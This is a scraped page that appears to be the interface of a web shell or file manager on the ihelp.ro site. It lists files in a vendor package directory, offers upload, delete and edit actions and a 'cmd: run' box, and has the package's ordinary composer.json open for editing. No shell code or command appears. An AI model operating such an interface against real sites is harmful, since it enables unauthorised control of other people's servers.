/
var
/
www
/
vhosts
/
ihelp.ro
/
httpdocs
/
vendor
/
psr
/
http-server-handler
/
/var/www/vhosts/ihelp.ro/httpdocs/vendor/psr/http-server-handler
mkdir
upload
Name
Size
Mode
Actions
src/
-
0755
rm
composer.json
739
0644
edit
dl
rm
LICENSE
1103
0644
edit
dl
rm
README.md
662
0644
edit
dl
rm
Edit:
/var/www/vhosts/ihelp.ro/httpdocs/vendor/psr/http-server-handler/composer.json
(739B)
{ "name": "psr/http-server-handler", "description": "Common interface for HTTP server-side request handler", "keywords": [ "psr", "psr-7", "psr-15", "http-interop", "http", "server", "handler", "request", "response" ], "license": "MIT", "authors": [ { "name": "PHP-FIG", "homepage": "https://www.php-fig.org/" } ], "require": { "php": ">=7.0", "psr/http-message": "^1.0 || ^2.0" }, "autoload": { "psr-4": { "Psr\\Http\\Server\\": "src/" } }, "extra": { "branch-alias": { "dev-master": "1.0.x-dev" } } }
Save
cmd:
run